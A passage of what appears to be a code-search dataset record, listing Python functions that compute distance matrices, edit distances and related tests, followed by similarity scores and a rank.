j in range(i + 1, nrow):\n self.dist_matrix[i,j] = self._pairwise_dist(self.data_vector[i],self.data_vector[j])\n self.dist_matrix[j,i] = self.dist_matrix[i,j]\n \n self.dist_frame = pd.DataFrame(self.dist_matrix,\n index = self.seq_strings,\n columns = self.seq_strings)", "def pairwise_distances(embeddings, squared=False):\n dot_product = tf.matmul(embeddings, tf.transpose(embeddings))\n square_norm = tf.diag_part(dot_product)\n\n # ||a - b||^2 = ||a||^2 - 2 <a, b> + ||b||^2\n # shape (batch_size, batch_size)\n distances = tf.expand_dims(square_norm, 1) - 2.0 * \\\n dot_product + tf.expand_dims(square_norm, 0)\n\n distances = tf.maximum(distances, 0.0)\n\n if not squared:\n mask = tf.to_float(tf.equal(distances, 0.0))\n distances = distances + mask * 1e-16\n distances = tf.sqrt(distances)\n distances = distances * (1.0 - mask)\n\n return distances", "def test_distances(self):\n sf = make_classifier_data(n=10, d=2, seed=37)\n sf.remove_column(\"class\", inplace=True)\n\n numeric_features = [\"int0\", \"int1\", \"float0\", \"float1\"]\n array_features = [\"array0\"]\n string_features = [\"str0\"]\n dict_features = [\"dict0\"]\n\n ## Numeric standard distances should work for numeric columns\n for d in [\n \"euclidean\",\n \"squared_euclidean\",\n \"manhattan\",\n \"cosine\",\n \"transformed_dot_product\",\n ]:\n try:\n m = tc.dbscan.create(\n sf,\n features=numeric_features,\n distance=d,\n radius=1,\n min_core_neighbors=3,\n verbose=False,\n )\n except:\n assert False, \"Standard distance {} failed.\".format(d)\n\n ## Numeric standard distances should work for array columns\n for d in [\n \"euclidean\",\n 
\"squared_euclidean\",\n \"manhattan\",\n \"cosine\",\n \"transformed_dot_product\",\n ]:\n try:\n m = tc.dbscan.create(\n sf,\n features=array_features,\n distance=d,\n radius=1,\n min_core_neighbors=3,\n verbose=False,\n )\n except:\n assert False, \"Standard distance {} failed.\".format(d)\n\n ## String standard distances should work.\n for d in [\"levenshtein\"]:\n try:\n m = tc.dbscan.create(\n sf,\n features=string_features,\n distance=d,\n radius=1,\n min_core_neighbors=3,\n verbose=False,\n )\n except:\n assert False, \"Standard distance {} failed.\".format(d)\n\n ## Dictionary standard distances should work.\n for d in [\"jaccard\", \"weighted_jaccard\", \"cosine\", \"transformed_dot_product\"]:\n try:\n m = tc.dbscan.create(\n sf,\n features=dict_features,\n distance=d,\n radius=1,\n min_core_neighbors=3,\n verbose=False,\n )\n except:\n assert False, \"Standard distance {} failed.\".format(d)\n\n # Nonsensical combinations of feature types and distances should fail.\n with self.assertRaises(ValueError):\n m = tc.dbscan.create(\n sf,\n features=numeric_features,\n distance=\"levenshtein\",\n radius=1,\n min_core_neighbors=3,\n verbose=False,\n )\n\n with self.assertRaises(ToolkitError):\n m = tc.dbscan.create(\n sf,\n features=dict_features,\n distance=\"levenshtein\",\n radius=1,\n min_core_neighbors=3,\n verbose=False,\n )\n\n with self.assertRaises(ToolkitError):\n m = tc.dbscan.create(\n sf,\n features=string_features,\n distance=\"euclidean\",\n radius=1,\n min_core_neighbors=3,\n verbose=False,\n )\n\n # If no distance is specified, the automatic distance construction\n # should kick in and be correct.\n correct_dist = [\n [[\"str0\"], \"levenshtein\", 1],\n [[\"str1\"], \"levenshtein\", 1],\n [[\"dict0\"], \"jaccard\", 1],\n [[\"int0\", \"int1\", \"float0\", \"float1\"], \"euclidean\", 1],\n [[\"array0\"], \"euclidean\", 1],\n ]\n\n m = tc.dbscan.create(\n sf, radius=1, distance=None, min_core_neighbors=3, verbose=False\n )\n\n self.assertItemsEqual(m.distance, correct_dist)\n\n m = tc.dbscan.create(\n sf, radius=1, distance=\"auto\", min_core_neighbors=3, verbose=False\n )\n self.assertItemsEqual(m.distance, correct_dist)", "def nb_editdistance(seq_vec1, seq_vec2, distance_matrix=identity_nb_distance_matrix, gap_penalty=1):\n \n q_L = seq_vec1.shape[0]\n s_L = seq_vec2.shape[0]\n if q_L == s_L:\n \"\"\"No gaps: substitution distance\n This will make it differ from a strict edit-distance since\n the optimal edit-distance may insert same number of gaps in both sequences\"\"\"\n dist = 0\n for i in range(q_L):\n dist += distance_matrix[seq_vec1[i], seq_vec2[i]]\n return dist\n\n ldmat = np.zeros((q_L, s_L), dtype=np.int16)\n for row in range(1, q_L):\n ldmat[row, 0] = row * gap_penalty\n\n for col in range(1, s_L):\n ldmat[0, col] = col * gap_penalty\n \n for col in range(1, s_L):\n for row in range(1, q_L):\n ldmat[row, col] = min(ldmat[row-1, col] + gap_penalty,\n ldmat[row, col-1] + gap_penalty,\n ldmat[row-1, col-1] + distance_matrix[seq_vec1[row-1], seq_vec2[col-1]]) # substitution\n return ldmat[row, col]", "def edit_distance(s1, s2, transpositions=False):\r\n # set up a 2-D array\r\n len1 = len(s1)\r\n len2 = len(s2)\r\n lev = _edit_dist_init(len1 + 1, len2 + 1)\r\n\r\n # iterate over the array\r\n for i in range(len1):\r\n for j in range(len2):\r\n _edit_dist_step(lev, i + 1, j + 1, s1, s2, transpositions=transpositions)\r\n return lev[len1][len2]", "def _evaluate_seq_distance(self, log_data, simulation_data, metric):\n similarity = list()\n def pbar_async(p, msg):\n 
pbar = tqdm(total=reps, desc=msg)\n processed = 0\n while not p.ready():\n cprocesed = (reps - p._number_left)\n if processed < cprocesed:\n increment = cprocesed - processed\n pbar.update(n=increment)\n processed = cprocesed\n time.sleep(1)\n pbar.update(n=(reps - processed))\n p.wait()\n pbar.close()\n # define the type of processing sequencial or parallel\n cases = len(set([x['caseid'] for x in log_data]))\n if cases <= self.max_cases:\n args = (metric, simulation_data, log_data,\n self.alpha_concurrency.oracle,\n ({'min': 0, 'max': len(simulation_data)},\n {'min': 0, 'max': len(log_data)}))\n df_matrix = self._compare_traces(args)\n else:\n cpu_count = multiprocessing.cpu_count()\n mx_len = len(log_data)\n ranges = self.define_ranges(mx_len, int(np.ceil(cpu_count/2)))\n ranges = list(itertools.product(*[ranges, ranges]))\n reps = len(ranges)\n pool = Pool(processes=cpu_count)\n # Generate\n args = [(metric, simulation_data[r[0]['min']:r[0]['max']],\n log_data[r[1]['min']:r[1]['max']],\n self.alpha_concurrency.oracle,\n r) for r in ranges]\n p = pool.map_async(self._compare_traces, args)\n if self.verbose:\n pbar_async(p, 'evaluating '+metric+':')\n pool.close()\n # Save results\n df_matrix = pd.concat(list(p.get()), axis=0, ignore_index=True)\n df_matrix.sort_values(by=['i', 'j'], inplace=True)\n df_matrix = df_matrix.reset_index().set_index(['i','j'])\n if metric == 'dl_mae':\n dl_matrix = df_matrix[['dl_distance']].unstack().to_numpy()\n mae_matrix = df_matrix[['mae_distance']].unstack().to_numpy()\n # MAE normalized\n max_mae = mae_matrix.max()\n mae_matrix = np.divide(mae_matrix, max_mae)\n # multiple both matrixes by Beta equal to 0.5\n dl_matrix = np.multiply(dl_matrix, 0.5)\n mae_matrix = np.multiply(mae_matrix, 0.5)\n # add each point in between\n cost_matrix = np.add(dl_matrix, mae_matrix)\n else:\n cost_matrix = df_matrix[['distance']].unstack().to_numpy()\n row_ind, col_ind = linear_sum_assignment(np.array(cost_matrix))\n # Create response\n for idx, idy in zip(row_ind, col_ind):\n similarity.append(dict(caseid=simulation_data[idx]['caseid'],\n sim_order=simulation_data[idx]['profile'],\n log_order=log_data[idy]['profile'],\n sim_score= (cost_matrix[idx][idy]\n if metric == 'mae' else\n (1-(cost_matrix[idx][idy])))\n )\n )\n return similarity", "def _calc_distances(preds, targets, mask, normalize):\n N, K, _ = preds.shape\n _mask = mask.copy()\n _mask[np.where((normalize == 0).sum(1))[0], :] = False\n distances = np.full((N, K), -1, dtype=np.float32)\n normalize[np.where(normalize <= 0)] = 1000000.0\n distances[_mask] = np.linalg.norm(((preds - targets) / normalize[:, None, :])[_mask], axis=-1)\n return distances.T", "def compute_euclidean_distance_matrix(locations):\n distances = {}\n distances_df=get_times(locations)\n print(distances_df)\n print(distances_df.iloc[0,0])\n print(distances_df.iloc[0,1])\n print(distances_df.iloc[0,2])\n for from_counter, from_node in enumerate(locations):\n distances[from_counter] = {}\n for to_counter, to_node in enumerate(locations):\n distances[from_counter][to_counter] = (int(\n distances_df.iloc[from_counter,to_counter]))\n return distances", "def cmc(distmat, glabels=None, plabels=None, ds=None, repeat=None):\n m, n = distmat.shape\n if glabels is None and plabels is None:\n glabels = np.arange(0, m)\n plabels = np.arange(0, n)\n if isinstance(glabels, list):\n glabels = np.asarray(glabels)\n if isinstance(plabels, list):\n plabels = np.asarray(plabels)\n ug = np.unique(glabels)\n if ds is None:\n ds = ug.size\n if repeat is None:\n if 
ds == ug.size and ug.size == len(glabels):\n repeat = 1\n else:\n repeat = 100\n\n ret = 0\n for __ in xrange(repeat):\n # Randomly select gallery labels\n G = np.random.choice(ug, ds, replace=False)\n # Select corresponding probe samples\n p_inds = [i for i in xrange(len(plabels)) if plabels[i] in G]\n P = plabels[p_inds]\n # Randomly select one gallery sample per label selected\n D = np.zeros((ds, P.size))\n for i, g in enumerate(G):\n samples = np.where(glabels == g)[0]\n j = np.random.choice(samples)\n D[i, :] = distmat[j, p_inds]\n # Compute CMC\n ret += _cmc_core(D, G, P)\n return ret / repeat", "def distance_matrix(n_row, n_col):\n\n n_pop = int(n_row * n_col)\n center = int(n_row/2*(n_col+1))\n\n pop_idx = np.arange(n_pop)\n pop_idx_col = np.remainder(pop_idx, n_col)\n pop_idx_row = pop_idx // n_row\n\n pos = np.vstack((pop_idx_col,pop_idx_row)).T\n distance = spa.distance.cdist([pos[center]], pos)[0]\n\n return distance", "def distance_matrix(sunspots1, sunspots2):\n \n N1 = len(sunspots1)\n N2 = len(sunspots2)\n\n distance_matrix = np.zeros((N1, N2))\n\n for i in list(range(N1)):\n for j in list(range(N2)):\n\n distance_matrix[i, j] = euclidean_dist(sunspots1[i], sunspots2[j])\n\n return distance_matrix", "def distance(sig):\n df_sig = np.diff(sig)\n return np.sum([np.sqrt(1+df**2) for df in df_sig])", "def _pairwise_dist(cx, cy, p=2, _pow_flag=False):\n def _are_equal(cx, cy):\n if cx is cy:\n return True\n return torch.equal(cx, cy)\n\n res = None\n m = cx.size(0)\n n = cy.size(0)\n imsize = cx.view(m, -1).size(-1)\n cx_eq_cy = _are_equal(cx, cy)\n\n if cx_eq_cy:\n # logger.debug(\"Calc pairwise distance with pytorch.pdist.\")\n # Calculate only triangular, fast, cheaper, stable. Looks like this:\n # torch.cat([torch.full((n - i - 1,), i, dtype=torch.int64) for i in range(n)])\n res = F.pdist(cx.view(m, -1), p=p)\n elif p == 2 and m * n * imsize * (torch.finfo(cx.dtype).bits // 8) > 4 * 1024**2:\n # logger.debug(\"Calc pairwise distance with quadratic expansion.\")\n # If more than 4MB needed to repr a full matrix\n # Faster and cheaper, but less stable (quadratic expansion)\n # Still slower than the first choice\n cx_ = cx.view(m, -1)\n cy_ = cy.view(n, -1)\n cx_norm = cx_.pow(2).sum(dim=-1, keepdim=True)\n cy_norm = cy_.pow(2).sum(dim=-1, keepdim=True).transpose(-2, -1)\n res = cx_norm + cy_norm - 2 * cx_.matmul(cy_.transpose(-2, -1))\n\n if cx_eq_cy:\n # Ensure zero diagonal\n diag_inds = torch.arange(m)\n res[diag_inds, diag_inds] = 0\n\n # Zero out negative values\n res.clamp_min_(0)\n if _pow_flag:\n _pow_flag[0] = True\n else:\n res = res.sqrt()\n else:\n # logger.debug(\"Calc pairwise distance with naive broadcasting.\")\n # More expensive - Θ(n^2 d), but numerically more stable\n cx_ = cx.view(m, 1, -1)\n cy_ = cy.view(1, n, -1)\n # XXX does not support broadcasting yet #15918 and #15901\n # res = F.pairwise_distance(cx_, cy_, p=p, eps=1e-8)\n res = torch.norm(cx_ - cy_, p=p, dim=-1)\n\n return res", "def manhattan_distance(index1=(), index2=()):\r\n md = 0\r\n for a1, a2 in zip(index1, index2):\r\n md += abs(a1-a2)\r\n return md", "def distance_neighbors(coords, pairs):\n \n # source nodes coordinates\n c0 = coords[pairs[:,0]]\n # target nodes coordinates\n c1 = coords[pairs[:,1]]\n distances = (c0 - c1)**2\n distances = np.sqrt(distances.sum(axis=1))\n return distances", "def euclidean_distance(pid_series, series_was_shifted_to, norm=False, acc=False):\n pids = pid_series.keys()\n pids.sort()\n series = pid_series.values()\n if acc:\n series = [accumulate_series(s) 
for s in series]\n if norm:\n series = [normalise_series(s) for s in series]\n\n N = len(pids)\n dist_matrix = np.zeros((N, N))\n # max_distance = 0\n for i in range(N):\n for j in range(N):\n if i <= j:\n continue\n dist_vector = __get_euclidean__(series[i], series[j], series_was_shifted_to)\n # max_distance = max(max_distance, np.max(dist_vector))\n eucl = np.average(dist_vector)\n dist_matrix[i, j] = eucl\n dist_matrix[j, i] = eucl\n\n # dist_matrix = np.round(np.true_divide(dist_matrix, max_distance), decimals=round_to_decimals)\n df = pd.DataFrame(dist_matrix, index=pids, columns=pids)\n return df", "def test_get_adjacent_distances(self):\r\n dm_str = [\"\\ts1\\ts2\\ts3\", \"s1\\t0\\t2\\t4\", \"s2\\t2\\t0\\t3.2\",\r\n \"s3\\t4\\t3.2\\t0\"]\r\n dm_header, dm = parse_distmat(dm_str)\r\n # error cases: fewer than 2 valid sample ids\r\n self.assertRaises(ValueError,\r\n get_adjacent_distances, dm_header, dm,\r\n [])\r\n self.assertRaises(ValueError,\r\n get_adjacent_distances, dm_header, dm,\r\n ['s1'])\r\n self.assertRaises(ValueError,\r\n get_adjacent_distances, dm_header, dm,\r\n ['s0', 's1'])\r\n self.assertRaises(ValueError,\r\n get_adjacent_distances, dm_header, dm,\r\n ['s1', 's4'])\r\n\r\n # one pair of valid distances\r\n self.assertEqual(get_adjacent_distances(dm_header, dm, ['s1', 's2']),\r\n ([2], [('s1', 's2')]))\r\n self.assertEqual(get_adjacent_distances(dm_header, dm, ['s1', 's1']),\r\n ([0], [('s1', 's1')]))\r\n self.assertEqual(get_adjacent_distances(dm_header, dm, ['s1', 's3']),\r\n ([4], [('s1', 's3')]))\r\n self.assertEqual(get_adjacent_distances(dm_header, dm, ['s2', 's3']),\r\n ([3.2], [('s2', 's3')]))\r\n\r\n # multiple valid distances\r\n self.assertEqual(get_adjacent_distances(dm_header,\r\n dm,\r\n ['s1', 's2', 's3']),\r\n ([2, 3.2], [('s1', 's2'), ('s2', 's3')]))\r\n self.assertEqual(get_adjacent_distances(dm_header,\r\n dm,\r\n ['s1', 's3', 's2', 's1']),\r\n ([4, 3.2, 2], [('s1', 's3'), ('s3', 's2'), ('s2', 's1')]))\r\n\r\n # mixed valid and invalid distances ignores invalid distances\r\n self.assertEqual(get_adjacent_distances(dm_header,\r\n dm,\r\n ['s1', 's3', 's4', 's5', 's6', 's2', 's1']),\r\n ([4, 3.2, 2], [('s1', 's3'), ('s3', 's2'), ('s2', 's1')]))\r\n # strict=True results in missing sample ids raising an error\r\n self.assertRaises(ValueError, get_adjacent_distances,\r\n dm_header,\r\n dm,\r\n ['s1',\r\n 's3',\r\n 's4',\r\n 's5',\r\n 's6',\r\n 's2',\r\n 's1'],\r\n strict=True)", "def full_matrix(ops, mut):\n \n index_mat = np.ones((len(ops),len(ops)))\n pairs = np.argwhere(np.triu(index_mat)==1)\n dist_mat = np.zeros((len(ops),len(ops)))\n distances = []\n labels = []\n\n for pair in pairs:\n mi, label = mut.distance(ops[pair[0]], ops[pair[1]])\n distances.append(mi)\n labels.append(label)\n with ProgressBar():\n distances = dask.compute(*distances)\n\n for i in range(len(labels)):\n mut.memo[labels[i]] = distances[i]", "def _dist(A, B):\n return np.sqrt(np.einsum(\"ijk->ij\", (A[:, None, :] - B) ** 2))", "def sim_hits(tmat,start_list,targ_list,ntraj = 1000, cutoff=1000):\n \n # get state names\n nstates = tmat.shape[0]\n states = array([ii for ii in range(nstates)])\n \n trajs = list()\n \n for ii in range(ntraj):\n curr = choice(start_list)\n traj = list()\n traj.append(curr)\n while curr not in targ_list:\n weights = copy(tmat[curr, :])\n curr = discrete_dist(states, weights, nn=1)\n traj.append(curr)\n \n if len(traj)>=cutoff:\n # traj=[nan]\n break\n \n trajs.append(array(traj))\n\n return trajs", "def im_dist_mat(self):\n mat = 
np.zeros([self.I, self.M])\n for i in range(self.I):\n for m in range(self.M):\n mat[i, m] = distance(self.I_coords[i], self.M_coords[m])\n return mat" ]
[ "0.6867072", "0.6173414", "0.61204684", "0.59654254", "0.5629023", "0.5607086", "0.55902237", "0.55837727", "0.55610365", "0.5435831", "0.54259413", "0.5407338", "0.5377603", "0.5373048", "0.5354197", "0.5333928", "0.5265103", "0.52603585", "0.5210351", "0.5201209", "0.51830506", "0.51698697", "0.51546896", "0.514426", "0.51390195", "0.5131739", "0.51274806", "0.50870544", "0.505327", "0.50357234", "0.5009534", "0.5002475", "0.49929622", "0.49885955", "0.49766785", "0.49728706", "0.49712744", "0.4963018", "0.49619463", "0.49567276", "0.49513158", "0.49455646", "0.4933334", "0.4926115", "0.49218076", "0.49096555", "0.48991317", "0.48980093", "0.4895193", "0.48939365", "0.48939365", "0.48855412", "0.4883882", "0.48784757", "0.48753184", "0.48637748", "0.4862372", "0.48613396", "0.48605168", "0.48592594", "0.48465532", "0.484196", "0.48386276", "0.4824942", "0.48233315", "0.48158476", "0.48146296", "0.48089212", "0.48037523", "0.48028302", "0.47923094", "0.47861886", "0.47856975", "0.47782168", "0.47637326", "0.47615567", "0.47587246", "0.47538388", "0.4747834", "0.47436866", "0.47411054", "0.47403446", "0.47390574", "0.47326154", "0.47299463", "0.471991", "0.47059068", "0.47020382", "0.47019684", "0.46986982", "0.46977878", "0.4685967", "0.46822035", "0.46811098", "0.46786308", "0.4677407", "0.46758848", "0.46751362", "0.46699968", "0.4668613" ]
0.6814871
1
This function works fine on its own. Wrapping it in the Python function above was a workaround because joblib and multiprocessing seem to have an issue retaining default arguments on numba-compiled functions.
import numba as nb
import numpy as np

# tcr_nb_distance_matrix is the module-level default substitution matrix
# defined alongside this function.

def _nb_vector_tcrdist(indices, seqs_mat, seqs_L, distance_matrix=tcr_nb_distance_matrix, dist_weight=3, gap_penalty=4, ntrim=3, ctrim=2, fixed_gappos=True):
    assert seqs_mat.shape[0] == seqs_L.shape[0]

    dist = np.zeros(indices.shape[0], dtype=np.int16)
    for ind_i in nb.prange(indices.shape[0]):
        query_i = indices[ind_i, 0]
        seq_i = indices[ind_i, 1]
        q_L = seqs_L[query_i]
        s_L = seqs_L[seq_i]
        if q_L == s_L:
            # No gaps: weighted substitution distance over the untrimmed positions
            for i in range(ntrim, q_L - ctrim):
                dist[ind_i] += distance_matrix[seqs_mat[query_i, i], seqs_mat[seq_i, i]] * dist_weight
            continue

        short_len = min(q_L, s_L)
        len_diff = abs(q_L - s_L)
        if fixed_gappos:
            # Place the gap at a single fixed position near the middle of the
            # shorter sequence instead of searching over all positions
            min_gappos = min(6, 3 + (short_len - 5) // 2)
            max_gappos = min_gappos
        else:
            # Search over the allowed range of gap positions, widening it if
            # the sequence is too short for the default bounds
            min_gappos = 5
            max_gappos = short_len - 1 - 4
            while min_gappos > max_gappos:
                min_gappos -= 1
                max_gappos += 1
        min_dist = -1
        for gappos in range(min_gappos, max_gappos + 1):
            tmp_dist = 0
            remainder = short_len - gappos
            for n_i in range(ntrim, gappos):
                # n_i is the position counted from the N terminus
                tmp_dist += distance_matrix[seqs_mat[query_i, n_i], seqs_mat[seq_i, n_i]]
            for c_i in range(ctrim, remainder):
                # c_i is the position counted upwards from the C terminus
                tmp_dist += distance_matrix[seqs_mat[query_i, q_L - 1 - c_i], seqs_mat[seq_i, s_L - 1 - c_i]]
            if tmp_dist < min_dist or min_dist == -1:
                min_dist = tmp_dist
            if min_dist == 0:
                break
        dist[ind_i] = min_dist * dist_weight + len_diff * gap_penalty
    return dist
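A minimal sketch of the workaround the query describes, assuming the names from the document above (_nb_vector_tcrdist and tcr_nb_distance_matrix) and an indices array of (query, target) row pairs; the wrapper names _vector_tcrdist and parallel_tcrdist are illustrative, not from the source. A plain-Python shim restates every numba default explicitly, so nothing is lost when joblib pickles the callable for its workers:

import numpy as np
from joblib import Parallel, delayed

def _vector_tcrdist(indices, seqs_mat, seqs_L):
    # Plain-Python shim: pass each default explicitly so the numba function
    # never has to recover its own defaults inside a joblib worker.
    return _nb_vector_tcrdist(indices, seqs_mat, seqs_L,
                              distance_matrix=tcr_nb_distance_matrix,
                              dist_weight=3, gap_penalty=4,
                              ntrim=3, ctrim=2, fixed_gappos=True)

def parallel_tcrdist(indices, seqs_mat, seqs_L, n_jobs=2):
    # Score chunks of index pairs in parallel and stitch the results back
    # together in the original order.
    chunks = np.array_split(indices, n_jobs)
    parts = Parallel(n_jobs=n_jobs)(
        delayed(_vector_tcrdist)(chunk, seqs_mat, seqs_L) for chunk in chunks)
    return np.concatenate(parts)

Chunking the index pairs rather than the sequences means each worker only needs read access to seqs_mat; with joblib's default loky backend, large arrays are memory-mapped automatically by default, so workers share the data instead of copying it.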
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_default_args(self):\n cfunc = njit(g)\n self.assertEqual(cfunc(1, 2, 3), g(1, 2, 3))\n self.assertEqual(cfunc(1, y=2, z=3), g(1, 2, 3))", "def __call__(self, *args, **kwargs):\n if Numba.numba_flag:\n return self.numba_fn(*args, **kwargs)\n else:\n return self.function(*args, **kwargs)", "def njit(func):\n return func", "def precompile_numba(self):\n\n t0 = time.time()\n\n # a. remember actual settings\n prev = dict()\n varnames = ['T','Nm','do_print','Nm_ret','Na_ret']\n for varname in varnames:\n prev[varname] = getattr(self.par,varname)\n\n # b. fast settings\n self.par.T = 2\n self.par.Nm_ret = 20\n self.par.Na_ret = 10\n self.par.Nm = 5\n self.par.do_print = False\n self.allocate()\n\n # c. solve\n self.solve()\n\n # d. reset\n for varname in varnames:\n setattr(self.par,varname,prev[varname]) \n\n self.allocate()\n\n if self.par.do_print:\n print(f'pre-compiled numba in {time.time()-t0:.2f} secs')", "def _make_one_arg_numba_func(func, func_args):\n try:\n func_numba = numba.jit(func, nopython=True)\n\n @numba.jit(nopython=True)\n def f(x, args=()):\n return func_numba(x, *args)\n\n # Attempt function call\n _ = f(np.array([1.0, 2.0]), func_args)\n\n return f, True\n except:\n\n def f(x, args=()):\n return func(x, *args)\n\n return f, False", "def parallel_func(func, n_jobs, verbose=None, max_nbytes='auto'):\n # for a single job, we don't need joblib\n if n_jobs == 1:\n n_jobs = 1\n my_func = func\n parallel = list\n return parallel, my_func, n_jobs\n\n try:\n from joblib import Parallel, delayed\n except ImportError:\n try:\n from sklearn.externals.joblib import Parallel, delayed\n except ImportError:\n warn('joblib not installed. Cannot run in parallel.')\n n_jobs = 1\n my_func = func\n parallel = list\n return parallel, my_func, n_jobs\n\n # check if joblib is recent enough to support memmaping\n p_args = _get_args(Parallel.__init__)\n joblib_mmap = ('temp_folder' in p_args and 'max_nbytes' in p_args)\n\n cache_dir = get_config('MNE_CACHE_DIR', None)\n if isinstance(max_nbytes, string_types) and max_nbytes == 'auto':\n max_nbytes = get_config('MNE_MEMMAP_MIN_SIZE', None)\n\n if max_nbytes is not None:\n if not joblib_mmap and cache_dir is not None:\n warn('\"MNE_CACHE_DIR\" is set but a newer version of joblib is '\n 'needed to use the memmapping pool.')\n if joblib_mmap and cache_dir is None:\n logger.info('joblib supports memapping pool but \"MNE_CACHE_DIR\" '\n 'is not set in MNE-Python config. To enable it, use, '\n 'e.g., mne.set_cache_dir(\\'/tmp/shm\\'). 
This will '\n 'store temporary files under /dev/shm and can result '\n 'in large memory savings.')\n\n # create keyword arguments for Parallel\n kwargs = {'verbose': 5 if logger.level <= logging.INFO else 0}\n\n if joblib_mmap:\n if cache_dir is None:\n max_nbytes = None # disable memmaping\n kwargs['temp_folder'] = cache_dir\n kwargs['max_nbytes'] = max_nbytes\n\n n_jobs = check_n_jobs(n_jobs)\n parallel = Parallel(n_jobs, **kwargs)\n my_func = delayed(func)\n return parallel, my_func, n_jobs", "def test_named_args(self):\n cfunc = njit(f)\n self.assertEqual(cfunc(1, 2, 3), f(1, 2, 3))\n self.assertEqual(cfunc(1, y=2, z=3), f(1, 2, 3))", "def _make_two_arg_numba_func(func, func_args):\n try:\n func_numba = numba.jit(func, nopython=True)\n\n @numba.jit(nopython=True)\n def f(x, args=()):\n return func_numba(x, *args)\n\n # Attempt function call\n _ = f(np.array([1.0, 2.0]), np.array([1.0, 2.0]), func_args)\n\n return f, True\n except:\n\n def f(x, y, args=()):\n return func(x, y, *args)\n\n return f, False", "def generate_numba_apply_func(\n func: Callable[..., Scalar],\n nopython: bool,\n nogil: bool,\n parallel: bool,\n):\n numba_func = jit_user_function(func)\n if TYPE_CHECKING:\n import numba\n else:\n numba = import_optional_dependency(\"numba\")\n\n @numba.jit(nopython=nopython, nogil=nogil, parallel=parallel)\n def roll_apply(\n values: np.ndarray,\n begin: np.ndarray,\n end: np.ndarray,\n minimum_periods: int,\n *args: Any,\n ) -> np.ndarray:\n result = np.empty(len(begin))\n for i in numba.prange(len(result)):\n start = begin[i]\n stop = end[i]\n window = values[start:stop]\n count_nan = np.sum(np.isnan(window))\n if len(window) - count_nan >= minimum_periods:\n result[i] = numba_func(window, *args)\n else:\n result[i] = np.nan\n return result\n\n return roll_apply", "def IB(px,py,pyx_c,maxbeta=5,numbeta=30,iterations=100,restarts=3,parallel = False):\n pm_size = px.size\n bs = np.linspace(0.01,maxbeta,numbeta) #value of beta\n if parallel != False:\n pool = mp.Pool(processes=parallel)\n results = [pool.apply_async(beta_iter,args=(b,px,py,pyx_c,pm_size,restarts,iterations,)) for b in bs]\n pool.close()\n results = [p.get() for p in results]\n ips = [x[0] for x in results]\n ifs = [x[1] for x in results]\n #Values of beta may not be sorted appropriately, code below sorts ipast and ifuture according to their corresponding value of beta, and in correct order\n b_s = [x[2] for x in results] \n ips = [x for _, x in sorted(zip(b_s,ips))]\n ifs = [x for _, x in sorted(zip(b_s,ifs))]\n elif parallel == False:\n\t ips = np.zeros(bs.size)\n\t ifs = np.zeros(bs.size)\n\t for bi in range(bs.size):\n\t\t candidates = []\n\t\t for r in range(restarts):\n\t\t\t # initialize distribution for bottleneck variable\n\t\t\t pm = np.random.rand(pm_size)+1\n\t\t\t pm /= pm.sum()\n\t\t\t pym_c = np.random.rand(py.size,pm.size)+1 # Starting point for the algorithm\n\t\t\t pym_c /= pym_c.sum(axis=0)\n\t\t\t\t# iterate the BA algorithm\n\t\t\t for i in range(iterations):\n\t\t\t\t pmx_c, z = p_mx_c(pm,px,py,pyx_c,pym_c,bs[bi])\n\t\t\t\t pm = p_m(pmx_c,px)\n\t\t\t\t pym_c = p_ym_c(pm,px,py,pyx_c,pmx_c)\n\t\t\t\t if i>0 and np.allclose(pmx_c,pmx_c_old,rtol=1e-3,atol=1e-3):\n\t\t\t\t\t\t# if the x->m mapping is not updating any more, we're at convergence and we can stop\n\t\t\t\t\t break\n\t\t\t\t pmx_c_old = pmx_c\n\t\t\t candidates.append({'past_info' : mi_x1x2_c(pm, px, pmx_c),\n\t\t\t\t\t\t\t\t 'future_info' : mi_x1x2_c(py, pm, pym_c),\n\t\t\t\t\t\t\t\t 'functional' : -np.log2(np.inner(z,px))})\n\t\t\t# 
among the restarts, select the result that gives the minimum\n\t\t\t# value for the functional we're actually minimizing (eq 29 in\n\t\t\t# Tishby et al 2000).\n\t\t selected_candidate = min(candidates, key=lambda c: c['functional'])\n\t\t ips[bi] = selected_candidate['past_info']\n\t\t ifs[bi] = selected_candidate['future_info']\n # restrict the returned values to those that, at each value of\n # beta, actually increase (for Ipast) and do not decrease (for\n # Ifuture) the information with respect to the previous value of\n # beta. This is to avoid confounds from cases where the AB\n # algorithm gets stuck in a local minimum.\n ub, bs = compute_upper_bound(ips, ifs, bs)\n ips = np.squeeze(ub[:,0])\n ifs = np.squeeze(ub[:,1])\n return ips, ifs, bs", "def paramap(func, in_list, out_shape=None, n_jobs=-1, engine=\"joblib\",\n backend=None, func_args=None, func_kwargs=None,\n **kwargs):\n\n func_args = func_args or []\n func_kwargs = func_kwargs or {}\n\n if engine == \"joblib\":\n if not has_joblib:\n raise joblib()\n if backend is None:\n backend = \"loky\"\n pp = joblib.Parallel(\n n_jobs=n_jobs, backend=backend,\n **kwargs)\n dd = joblib.delayed(func)\n d_l = [dd(ii, *func_args, **func_kwargs) for ii in in_list]\n results = pp(tqdm(d_l))\n\n elif engine == \"dask\":\n if not has_dask:\n raise dask()\n if backend is None:\n backend = \"threading\"\n\n if n_jobs == -1:\n n_jobs = multiprocessing.cpu_count()\n n_jobs = n_jobs - 1\n\n def partial(func, *args, **keywords):\n def newfunc(in_arg):\n return func(in_arg, *args, **keywords)\n return newfunc\n pp = partial(func, *func_args, **func_kwargs)\n dd = [dask.delayed(pp)(ii) for ii in in_list]\n if backend == \"multiprocessing\":\n results = dask.compute(*dd, scheduler=\"processes\",\n workers=n_jobs, **kwargs)\n elif backend == \"threading\":\n results = dask.compute(*dd, scheduler=\"threads\",\n workers=n_jobs, **kwargs)\n else:\n raise ValueError(\"%s is not a backend for dask\" % backend)\n\n if engine == \"ray\":\n if not has_ray:\n raise ray()\n\n func = ray.remote(func)\n results = ray.get([func.remote(ii, *func_args, **func_kwargs)\n for ii in in_list])\n\n elif engine == \"serial\":\n results = []\n for in_element in in_list:\n results.append(func(in_element, *func_args, **func_kwargs))\n\n if out_shape is not None:\n return np.array(results).reshape(out_shape)\n else:\n return results", "def __call__(self, *args, **kwargs):\n dprint(2, \"FunctionMetadata::__call__\", self.func.__name__, args, kwargs, self.numba_args)\n atypes = tuple([type(x) for x in args])\n try_again = True\n count = 0\n if not self.numba_pfunc:\n if len(self.numba_args) == 0 and not self.no_global_cache:\n self.numba_pfunc = get_fm(FillerFunc(self.func), True)\n self.numba_func = get_fm(FillerFunc(self.func), False)\n else:\n self.numba_pfunc = 